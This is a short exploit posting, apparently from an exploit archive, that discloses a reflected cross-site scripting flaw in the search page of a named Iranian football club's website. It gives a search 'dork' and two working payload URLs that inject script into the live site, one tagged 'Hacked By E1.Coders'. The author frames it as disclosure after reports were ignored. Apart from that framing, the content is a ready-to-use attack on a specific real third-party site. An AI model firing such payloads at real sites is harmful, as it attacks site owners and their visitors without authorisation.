Esteghlal F.C. Cross Site Scripting

Esteghlal F.C. Cross Site Scripting

EXPLOIT XSS Esteghlal F.C. (باشگاه فوتبال استقلال تهران) Sitehttps://fcesteghlal.ir   suffers from a remote XSS vulnerability.This security incident was reported by the SOC and Maher team and prevention centers and was ignoredthis site has not responded to their reports so we are posting this to add visibility to the issue.#################################################################################################### ##   Exploit Title : The Tehran Independence Club site, which is a government site "belonging to the government of the Islamic Republic of Iran", has an XSS INJECTION vulnerability.   ## ## Author : E1.Coders ## ## Contact : E1.Coders [at] Mail [dot] RU ## ## Portal Link :   https://fcesteghlal.ir/   ## ## Security Risk : high ## ## Description : All sites coded and designed by novinvision ## ## DorK : fcesteghlal.ir/search?term= ## ##################################################################################################### ## Expl0iTs:   https://fcesteghlal.ir/search?term=<img+src/onerror=prompt(8)>##   https://fcesteghlal.ir/search?term=<script>alert('Hacked+By+E1.Coders')</script>